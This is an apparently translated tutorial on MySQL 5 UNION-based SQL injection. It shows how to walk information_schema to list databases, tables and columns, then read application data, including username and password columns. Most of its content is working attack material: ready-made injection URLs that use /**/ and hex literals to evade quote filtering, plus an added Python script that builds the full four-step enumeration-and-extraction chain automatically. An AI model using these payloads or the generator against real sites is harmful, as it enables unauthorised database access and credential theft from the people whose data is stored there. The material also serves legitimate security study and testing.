I hope it will be useful to you. For more information, see the original article on the Knife guest blog.
This article walks through the MySQL 5 injection technique described there and explains each statement.
mysql> use information_schema;
Database changed
mysql> show tables;
+---------------------------------------+
| Tables_in_information_schema          |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| KEY_COLUMN_USAGE                      |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
If you are interested, install MySQL 5 yourself and study what each of these tables stores. Here I only pick out the three tables that are useful during an injection:
| SCHEMATA -> stores the database names
| --> key field: SCHEMA_NAME, the database name
| TABLES -> stores the table names
| --> key fields: TABLE_SCHEMA, the database the table belongs to;
TABLE_NAME, the table name.
| COLUMNS -> stores the column (field) names
| --> key fields: TABLE_SCHEMA, the database the column's table belongs to;
TABLE_NAME, the table the column belongs to;
COLUMN_NAME, the column name.
So all we have to do is build queries against these three tables through the injection point, read the key fields one by one, and we end up with the database, table and column names we need to pull out the data itself.
Statement (1): mysql> select * from information_schema.schemata
Queries all databases from the MySQL 5 system library.
Corresponding injection statement: xx.com/news_info.php?wid=-1/**/union/**/select/**/1,SCHEMA_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.SCHEMATA/**/limit/**/17,1/*
Note: wid=-1 makes the original query return no row, so the row produced by the UNION is what the page renders; the fifteen numbers match the column count of the original SELECT, and position 2 is the one echoed to the page. The /**/ comments stand in for spaces, and the trailing /* comments out whatever follows the injection point. Step the first LIMIT parameter (the offset, 17 here) to list every database name one at a time.
Statement (2): mysql> select table_name from information_schema.tables where table_schema=0x64697363757A
Queries all table names in the database discuz from the MySQL 5 system library, where 0x64697363757A is the hexadecimal form of discuz. A MySQL hex literal compares equal to the corresponding string, so the payload needs no quote characters.
Note: append LIMIT n,1 and increase n by one per request so that exactly one table name is shown each time.
Corresponding injection statement (this example URL filters on 0x77656262617365, which decodes to webbase, i.e. a different database from the one in the statement above): xx.com/news_info.php?wid=-1/**/union/**/select/**/1,TABLE_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=0x77656262617365/**/limit/**/11,1
Statement (3): mysql> select column_name from information_schema.columns where table_name=0x6364625F7669727475616C666F72756D73
Queries all columns of the cdb_virtualforums table from the MySQL 5 system library; 0x6364625F7669727475616C666F72756D73 is the hexadecimal form of cdb_virtualforums. If a table of the same name exists in more than one database, add TABLE_SCHEMA=<hex of the database name> to the WHERE clause so that only the intended table is matched.
Note: append LIMIT n,1 and increase n by one per request so that exactly one column name is shown each time (the URL below uses a plain LIMIT 1, which only returns the first column name).
Corresponding injection statement: the hexadecimal form of tg_adminuser is 0x74675F61646D696E75736572. Retrieve the column names of the table one after another, as shown in the figure:
xx.com/news_info.php?wid=-1/**/union/**/select/**/1,COLUMN_NAME,3,4,5,6,7,8,9,10,11,12,13,14,15/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=0x74675F61646D696E75736572/**/limit/**/1
Statement (4): mysql> select name from discuz.cdb_virtualforums
Reads the values of the column name from the table cdb_virtualforums in the discuz database. This step queries the application's own database rather than the information_schema library; it is fully qualified as database.table so it works whatever the current database of the connection is.
Note: append LIMIT n,1 and increase n by one per request so that exactly one row is shown each time.
Corresponding injection statement (this example pulls two columns, username into position 2 and password into position 5, which only works if the page displays both positions; otherwise combine them into the single visible position with concat()): xx.com/news_info.php?wid=-1/**/union/**/select/**/1,username,3,4,password,6,7,8,9,10,11,12,13,14,15/**/from/**/discuz.cdb_virtualforums
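The four statements above are one procedure: database names, then tables, then columns, then data. The following Python script is an added example, not code from the original article or from the Knife guest blog; it builds the same four payloads so the hex literals, the column layout of the UNION and the LIMIT offset stepping are produced consistently instead of by hand. It assumes, as the article's URLs imply, that the original SELECT has 15 columns, that column 2 is the one echoed to the page, and that the injectable parameter is called wid; the host xx.com is the placeholder used in the article. It also goes slightly beyond the text by filtering the COLUMNS query on TABLE_SCHEMA as well as TABLE_NAME and by joining several data columns with concat() so they fit through one visible position.

```python
"""Payload builder for the information_schema enumeration walk:
SCHEMATA -> TABLES -> COLUMNS -> data.

Added example, not code from the original article. Assumptions (hypothetical):
the injected SELECT has 15 columns, column 2 is echoed into the page and the
injectable parameter is `wid`, as the article's sample URLs imply. Spaces are
written as /**/ and string literals as 0x... hex literals, so the finished
payload contains neither spaces nor quote characters.
"""
from urllib.parse import quote

TOTAL_COLS = 15   # column count of the original SELECT (assumed)
VISIBLE_COL = 2   # UNION position rendered by the page (assumed)


def to_hex_literal(s: str) -> str:
    """'discuz' -> '0x64697363757A'. A MySQL hex literal compares equal to
    the string, so the WHERE clause needs no quotes."""
    return "0x" + s.encode("utf-8").hex().upper()


def from_hex_literal(lit: str) -> str:
    """Decode a 0x... literal back to text, to check what a payload targets."""
    if not lit.lower().startswith("0x") or len(lit) % 2:
        raise ValueError(f"not a hex literal: {lit!r}")
    return bytes.fromhex(lit[2:]).decode("utf-8")


def union_select(expr: str, source: str, where: str = "", offset: int = 0) -> str:
    """-1/**/union/**/select/**/1,<expr>,3,...,15/**/from/**/<source>
    [/**/where/**/<where>]/**/limit/**/<offset>,1

    -1 empties the original result set, so only the UNION row is rendered.
    LIMIT offset,1 returns exactly one row; stepping `offset` walks the
    result set one row per request, as the article's notes describe."""
    cols = [str(i) for i in range(1, TOTAL_COLS + 1)]
    cols[VISIBLE_COL - 1] = expr
    parts = ["-1", "union", "select", ",".join(cols), "from", source]
    if where:
        parts += ["where", where]
    parts += ["limit", f"{offset},1"]
    return "/**/".join(parts)


def schema_payload(offset: int) -> str:
    """Step 1: one database name per request."""
    return union_select("SCHEMA_NAME", "information_schema.SCHEMATA", offset=offset)


def table_payload(db: str, offset: int) -> str:
    """Step 2: the table names of one database."""
    return union_select("TABLE_NAME", "information_schema.TABLES",
                        where=f"TABLE_SCHEMA={to_hex_literal(db)}", offset=offset)


def column_payload(db: str, table: str, offset: int) -> str:
    """Step 3: the column names of one table. Filtering on TABLE_SCHEMA as well
    as TABLE_NAME keeps out same-named tables from other databases."""
    where = (f"TABLE_SCHEMA={to_hex_literal(db)}/**/and/**/"
             f"TABLE_NAME={to_hex_literal(table)}")
    return union_select("COLUMN_NAME", "information_schema.COLUMNS",
                        where=where, offset=offset)


def data_payload(db: str, table: str, columns: list[str], offset: int = 0) -> str:
    """Step 4: read the data. Several columns are joined with concat() and a
    0x3A (':') separator so they all fit through the single visible position."""
    expr = columns[0] if len(columns) == 1 else f"concat({',0x3A,'.join(columns)})"
    return union_select(expr, f"{db}.{table}", offset=offset)


def build_url(base: str, param: str, payload: str) -> str:
    """Attach the payload as the value of `param`, leaving / * , = . unencoded."""
    return f"{base}?{param}={quote(payload, safe='/*,=.')}"


if __name__ == "__main__":
    base = "http://xx.com/news_info.php"   # placeholder host from the article
    print(build_url(base, "wid", schema_payload(17)))
    print(build_url(base, "wid", table_payload("discuz", 11)))
    print(build_url(base, "wid", column_payload("discuz", "cdb_virtualforums", 0)))
    print(build_url(base, "wid", data_payload("discuz", "cdb_virtualforums",
                                              ["username", "password"])))
    # The article's second URL filters on 0x77656262617365, a different database:
    print(from_hex_literal("0x77656262617365"))   # webbase
```

Run it once per offset value to walk each result set row by row; the only state to carry between requests is the offset. Because every literal is hex-encoded, the same payloads still work when the application escapes or strips quote characters, which is the reason the article writes database and table names as 0x... in the first place.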